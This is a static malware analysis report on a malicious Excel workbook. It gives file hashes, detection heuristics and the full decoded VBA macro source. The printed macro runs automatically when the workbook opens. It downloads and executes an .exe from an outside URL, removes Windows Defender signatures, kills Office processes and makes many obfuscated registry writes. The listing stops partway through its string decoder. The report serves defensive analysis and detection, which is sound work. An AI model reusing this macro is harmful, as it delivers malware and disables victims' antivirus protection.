Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 aaf271fd042da770…

MALICIOUS

Office (OOXML)

Size: 21.0 KB
Created: 2006-09-16 00:00:00 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2021-02-23
MD5: e44854540fed182dcb6bfb2374cf6e7b
SHA-1: 59b9403ef62eb8d459351d8835f115ae57bc9511
SHA-256: aaf271fd042da770d0a0d85d4ed872812bf715dc58988470e8aab1af4629f95a
Risk Score: 510

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Matched line in script
    Shell (ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")))
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    Matched line in script
    Set tskkills = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    .write xHttp.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
  • CreateObject call high OLE_VBA_CREATEOBJ
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
  • cmd.exe reference in VBA high OLE_VBA_CMD
    Matched line in script
    Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://stemtopx.com/work/20.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 22034 bytes
SHA-256: 4931ce8bd34387aee63c62a50b0a1f01e1e42e2890fbc116b4691413f0eae961
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub tfastgdyugsuf()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
Dim bStrm: Set bStrm = CreateObject(ETJBuhLeL(bFiJlSB8k("ÂÁÖô¶F46400G71565047434F", "AQOH6ke2r")))
xHttp.Open "GET", "http://stemtopx.com/work/20.exe", False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")), 2 '
End With
Shell (ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")))
Set defender = CreateObject(ETJBuhLeL(bFiJlSB8k("›W‹³61504;52560G714:474A4A", "R31evr5K9")))
Dim Start
Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit"
defender.Run Start, vbHide
Set tskkills = CreateObject("WScript.Shell")
Dim STArTkwZkills
STArTkwZkills = "cmd /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit"
tskkills.Run STArTkwZkills, vbHide
Set wso = CreateObject(ETJBuhLeL(bFiJlSB8k("›W‹³61504;52560G714:474A4A", "R31evr5K9")))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("l–Tü´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "xsxFElisg")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÂÈÔ‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "LuXXJjiSt")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("¦ zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "C2j5sVMzx")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("è€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "t8DFUoGej")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "B05ls9Rxz")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("è€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "CN4Mk1AWY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "kFYqShidu")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "L12Z61XJE")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ˆ@Ú¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "kNI0IRIKx")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("( Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "V4H4yZWyG")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("šXŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "LVnSXqC7x")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "WROmgMHYL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "VLYzx1kj7")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("œhª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "dkcg2YPVB")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" ^úâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "jxAaFaFqL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("î€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "PfaW5IkV1")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" fŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "UZ1gsg7mb")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" fŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "yiORlLOTp")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(". Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "h5GFnr3qC")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "hxm6t08wi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "pei5HeYp2")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("<6*|J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "uTfV4KmOY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("l–Tü´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "vjjOLIXzy")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("tF4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "gLThyo2Yf")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" vª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "nB2wQ7fTY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "kNSwWKz2I")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ä˜t<41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "f3XN5vmIk")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ceafMwdwW")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ü¨ |J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "x113Ods39")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("’hª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "kxjT7tuCj")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Rö” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ApDp8q9nV")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" NÚ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "tEKzNeYme")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("æ�dÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "EeYaIlCxX")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ŒHê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ctbXRAqBZ")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÈÀÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "GK7UhDbQk")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("’hª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "UfqUNNJg8")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("\ö” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "Dh0Esbczo")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("tF4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "uheuC0eh3")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("¼(*|J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "YBsSh4XVU")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("HÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "TGtgRRqgD")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("nŽDœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "TbMgo2YGr")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Òè” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "DDHQkiy1K")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("( Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "VPKYhBoq5")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("@ÞäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "YZsvodgLN")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("|¶ |J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "vpKxVRoMY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("´86@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "a7CxcWILc")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("FÞäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "CwIA6PQop")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("d¦t<41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "S3KRrCbqi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("& zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "sRJikuUPH")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("4:6@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "VUywFZT0P")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÚØôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "ygJAUeAVp")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("HÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "EV0cXCXra")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("x®  г577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "zDZbxzi7n")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÈÀÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "VRM1qi6pt")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" vª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "SxOkr5sOY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÆÐäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "caznoKmHA")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "tJv3adPVi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "NT9PkrKxY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "gXnZVtJu3")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("  zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "qyoCDB81S")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Џ4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "hv0q3qI6R")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(". Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "FEgdbiCDL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("NÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "Q2g4mLqFr")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("€PúâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "rp3G0CAU7")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("šXŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "kIPorLm22")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
End Sub
Public Function ETJBuhLeL(ByVal HqtxDJMeY As String)
Dim IFctgq1Z1 As Long, MYPFllgV2 As String, nn4twvlYf As String
    On Local Error Resume Next
    For IFctgq1Z1 = 1 To Len(HqtxDJMeY) Step 2
        MYPFllgV2 = MYPFllgV2 & Chr$(Val(bFiJlSB8k("ž8", "SpuMxLdt5") & Mid$(HqtxDJMeY, IFctgq1Z1, 2)))
    Next IFctgq1Z1
    ETJBuhLeL = MYPFllgV2
End Function
Public Function bFiJlSB8k(ByVal CrMcSviMY As String, ByVal CglbOe0H1 As String) As String
On Error Resume Next
Dim k7Sc8zGx2(0 To 255) As Integer, IFctgq1Z1 As Integer, third As Long, fourth() As Byte
fourth() = StrConv(CglbOe0H1, vbFromUnicode)
For IFctgq1Z1 = 0 To 255
    third = (third + k7Sc8zGx2(IFctgq1Z1) + fourth(IFctgq1Z1 Mod Len(CglbOe0H1))) Mod 256
    k7Sc8zGx2(IFctgq1Z1) = IFctgq1Z1
Next IFctgq1Z1
fourth() = StrConv(CrMcSviMY, vbFromUnicode)
For IFctgq1Z1 = 0 To Len(CrMcSviMY)
